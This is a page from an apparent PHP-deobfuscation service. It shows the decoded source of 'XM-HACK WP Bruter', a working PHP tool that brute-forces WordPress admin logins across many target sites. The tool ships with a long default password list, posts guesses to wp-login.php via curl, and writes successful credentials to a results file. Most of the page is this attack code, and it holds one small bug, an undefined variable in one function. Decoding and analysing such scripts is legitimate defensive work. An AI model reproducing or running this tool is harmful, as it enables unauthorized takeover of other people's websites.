Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<? /* Cod3d by XM-HACK | XM-WordPress Bruter Mass Ver PHP */ eval(gzinflate(base6..
Decoded Output download
echo ' <html>
<head>
<link href="<link href="http://im44.gulfup.com/XMJ0ss.ico" rel="icon">" rel="icon">
<title>XM-HACK WP Bruter</title>
<style>
html, body {
background: black;
}
.noo {
width: 200px;
height: 30px;
color: rgba(255, 255, 255, 0.43);
background: rgba(255, 255, 255, 0.43);
border: #000;
font-size: 17px;
font-family: Segoe UI Light;
color: black;
cursor: pointer;
transition: all 0,1s;
}
.noo:hover {
background: black;
COLOR: white;
BORDER-COLOR: black;
}
.no {
width: 200px;
height: 30px;
background: black;
COLOR: white;
BORDER-COLOR: black;
}
.user {
width: 70px;
height: 21px;
}
.container {
width: 415px;
margin: 0 auto;
}
.zbi {
width: 300px;
height: 250px;
margin: 20px 0;
background: #2a2d35;
}
.zbi:hover {
background: rgba(255, 255, 255, 0.2);
}
.zbi:active, .btn:focus {
outline: 1px solid rgba(255, 255, 255, 0.3);
}
</style>
</br>
<center>
<form method="POST" action="" >
<font color="white" face="Impact" >Targets List</font><br>
<textarea name="sites" cols="40" rows="13" placeholder="http://www.Example.co.il/wp/" style="border: 1px dotted #2a2d35;" required="" class="zbi" ></textarea><br>
<font color="white" face="Impact" >Passwords List</font><br>
<textarea name="w0rds" cols="40" rows="13" class="zbi" style="border: 1px dotted #2a2d35;" >
123456
admin111
passwords
password0
password1
password2
passwords123
passwords1234
passwords12345
passwords123456
password123
password1234
password12345
password123456
admin123
admin12
admin1234
admin
administrator
administrator0
administrator1
administrator2
administrator3
administrator4
administrator5
administrator6
administrator7
administrator8
administrator9
administrator10
administrators
passwords
password0
password1
password2
admin12345
admin123456
ssw0rd
P@ssw0rd
22222
222222
2222222
22222222
222222222
2222222222
33333
333333
3333333
33333333
333333333
3333333333
44444
444444
4444444
44444444
444444444
4444444444
55555
555555
5555555
55555555
555555555
5555555555
66666
666666
6666666
66666666
666666666
6666666666
77777
777777
7777777
77777777
777777777
7777777777
88888
888888
8888888
88888888
888888888
8888888888
99999
999999
9999999
99999999
999999999
9999999999
%123456%
98765
987654
9876543
98765432
987654321
87654
876543
87654321
7654321
654321
54321
0123456
01234567
012345678
0123456780
01234567890
12345678910
123123
123123123
111222333
112233
123654
123789
123321
12321
121212
12121212
13131313
131313
141414
14141414
11223344
1122334455
112233445566
123321123
456456456
654654654
456654456
789789789
987987987
789987987
369369
369369369
963963963
258258258
258258
852852
852852852
147147
147147147
741741
741741741
336699
225588
114477
335577
115599
159357
444555666
777888999
666555444
333222111
111222333
999888777
666555444
111444777
777444111
222555888
333666999
999666333
888555222
98765
987654
9876543
98765432
987654321
9876543210
87654
876543
8765432
87654321
8765432109
76543
765432
7654321
76543210
765432109
7654321098
65432
654321
6543210
65432109
654321098
6543210987
54321
543210
5432109
54321098
543210987
5432109876
43210
432109
4321098
43210987
432109876
4321098765
01234
012345
0123456
01234567
012345678
0123456789
12345
123456
1234567
12345678
123456789
1234567890
23456
234567
2345678
23456789
234567890
2345678901
34567
345678
3456789
34567890
345678901
3456789012
34567891011
3456789101112
456789
4567890
45678901
456789012
4567890123
45678910
4567891011
456789101112
45678910111213
4567891011121314
456789101112131415
45678910111213141516
11111
111111
1111111
11111111
111111111
1111111111
22222
222222
2222222
22222222
222222222
2222222222
33333
333333
3333333
33333333
333333333
3333333333
44444
444444
4444444
44444444
444444444
4444444444
55555
555555
5555555
55555555
555555555
5555555555
66666
666666
6666666
66666666
666666666
6666666666
77777
777777
7777777
77777777
777777777
7777777777
88888
888888
8888888
88888888
888888888
8888888888
99999
999999
9999999
99999999
999999999
202020
20202020
202020202020
20202020202020
2020202020202020
3030303030303030
303030
30303030
3030303030
30303030303030
303030303030303
4040404040404040
404040
40404040
404040404040
4040404040
4040404040404040
aaaaa
bbbbb
ccccc
ddddd
eeeee
fffff
ggggg
hhhhh
iiiii
jjjjj
kkkkk
lllll
mmmmm
nnnnn
ooooo
ppppp
qqqqq
rrrrr
sssss
ttttt
uuuuu
vvvvv
wwwww
xxxxx
yyyyy
zzzzz
aaaaaa
bbbbbb
cccccc
dddddd
eeeeee
ffffff
gggggg
hhhhhh
iiiiii
jjjjjj
kkkkkk
llllll
mmmmmm
nnnnnn
oooooo
pppppp
qqqqqq
rrrrrr
ssssss
tttttt
uuuuuu
vvvvvv
wwwwww
xxxxxx
yyyyyy
zzzzzz
abcde
abcdef
abcdefg
abcdefgh
abcdefghi
abcdefghij
abcdefghijk
abcdefghijkl
abcdefghijklm
abcdefghijklmn
abcdefghijklmno
abcdefghijklmnop
abcdefghijklmnopq
abcdefghijklmnopqr
abcdefghijklmnopqrs
101010
111222333
222333444
333444555
444555666
555666777
00000
000000
0000000
00000000
000000000
0000000000
11111
111111
1111111
11111111
111111111
1111111111
22222
222222
2222222
22222222
222222222
2222222222
33333
333333
3333333
33333333
333333333
3333333333
44444
444444
4444444
44444444
444444444
4444444444
55555
555555
5555555
55555555
555555555
5555555555
66666
666666
6666666
66666666
666666666
6666666666
77777
777777
7777777
77777777
777777777
7777777777
88888
888888
8888888
88888888
888888888
8888888888
99999
999999
9999999
99999999
999999999
9999999999
%123456%
98765
987654
9876543
98765432
987654321
700700700
800800800
900900900
001001001
002002002
003003003
004004004
005005005
006006006
007007007
008008008
009009009
jjjjj
kkkkk
010101
010101010101
01010101
0101010101
01010101010
lllll
mmmmm
nnnnnf
ooooo
ppppp
qqqqq
rrrrr
sssss
ttttt
uuuuu
vvvvv
wwwww
xxxxx
</textarea><br>
<font color="white" face="Impact" >User</font><br>
<input type="text" name="usr" style="border: 1px dotted #2a2d35;" class="no" value="admin" ><br><br>
<input type=submit value="XM-HACK" class="noo" id="d4" name="x"><br>
</form>
</center>';
# Wordpress Mass brute Force Priv8 ^_*
# Coded by XM-HACK
@ set_time_limit ( 0 );
if( $_POST [ 'x' ]){
echo "<hr>" ;
$sites = explode ( "
" , $_POST [ "sites" ]); // Get Sites By XM-HACK !
$w0rds = explode ( "
" , $_POST [ "w0rds" ]); // Get w0rdLiSt By XM-HACK !
$Attack = new Wordpress_brute_Force (); // Active Class
foreach( $w0rds as $pwd ){
foreach( $sites as $site ){
$Attack -> check_it ( txt_cln ( $site ), $_POST [ 'usr' ], txt_cln ( $pwd )); // Brute :D
flush (); flush ();
}
}
}
# Class & Function'z
function txt_cln ( $value ){ return str_replace (array( "
" , "
" ), "" , $value ); }
class Wordpress_brute_Force {
public function check_it ( $site , $user , $pass ){ // print result
if( eregi ( 'profile.php' , $this -> post ( $site , $user , $pass ))){
echo "<span class=\"x2\"><b># Success : $user : $pass -> <a href=' $site /wp-admin/'> $site /wp-admin/</a></b></span><BR>" ;
$f = fopen ( "XM-HACK-rzl.txt" , "a+" ); fwrite ( $f , "Success ~~ $user : $pass -> $site /wp-admin/
" ); fclose ( $f );
flush ();
}else{ echo "Failed ---> $user : $pass F0r $site <BR>" ; flush ();}
}
public function post ( $site , $user , $pass ){ // Post -> user & pass
$login = $site . '/wp-login.php' ;
$to = $site . '/wp-admin' ;
$token = $this -> extract_token ( $site );
$log = array ( 'Log In' , '????' );
$data = array ( 'log' => $user , 'pwd' => $pass , 'rememberme' => 'forever' , 'wp-submit' => $log , 'redirect_to' => $to , 'testcookie' => 1 );
$curl = curl_init ();
curl_setopt ( $curl , CURLOPT_RETURNTRANSFER , 1 );
curl_setopt ( $curl , CURLOPT_URL , $login );
@ curl_setopt ( $curl , CURLOPT_COOKIEFILE , 'cookie.txt' );
@ curl_setopt ( $curl , CURLOPT_COOKIEJAR , 'cookie.txt' );
curl_setopt ( $curl , CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4' );
@ curl_setopt ( $curl , CURLOPT_FOLLOWLOCATION , 1 );
curl_setopt ( $curl , CURLOPT_POST , 1 );
curl_setopt ( $curl , CURLOPT_POSTFIELDS , $data );
curl_setopt ( $curl , CURLOPT_TIMEOUT , 20 );
$exec = curl_exec ( $curl );
curl_close ( $curl );
return $exec ;
}
public function extract_token ( $site ){ // get token from source for -> function post
$source = $this -> get_source ( $site );
preg_match_all ( "/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" , $source , $token );
return $token [ 1 ][ 0 ];
}
public function get_source ( $site ){ // get source for -> function extract_token
$curl = curl_init ();
curl_setopt ( $curl , CURLOPT_RETURNTRANSFER , 1 );
curl_setopt ( $curl , CURLOPT_URL , $login );
@ curl_setopt ( $curl , CURLOPT_COOKIEFILE , 'cookie.txt' );
@ curl_setopt ( $curl , CURLOPT_COOKIEJAR , 'cookie.txt' );
curl_setopt ( $curl , CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4' );
@ curl_setopt ( $curl , CURLOPT_FOLLOWLOCATION , 1 );
curl_setopt ( $curl , CURLOPT_TIMEOUT , 20 );
$exec = curl_exec ( $curl );
curl_close ( $curl );
return $exec ;
}
}
echo '
<center>
<font color="#eee" face="Segoe UI Light" size="5">.:: XM-HACK ::.</font><br>
<font size=1 face="Segoe UI Light" color=#eee >
< For all Friends ><br>
< made in morocco ><br>
< FB/XMehdiHack2 ><br>
< 2014-2015 ><br>
< Ver WP B ><br>
</font>
</center>
';
Did this file decode correctly?
Original Code
<? /* Cod3d by XM-HACK | XM-WordPress Bruter Mass Ver PHP */ eval(gzinflate(base64_decode(base64_decode(str_rot13('')))));?>
Function Calls
gzinflate | 1 |
str_rot13 | 1 |
base64_decode | 4 |
Stats
MD5 | 488fd7f745cf517b4c66442df6a67dbe |
Eval Count | 3 |
Decode Time | 114 ms |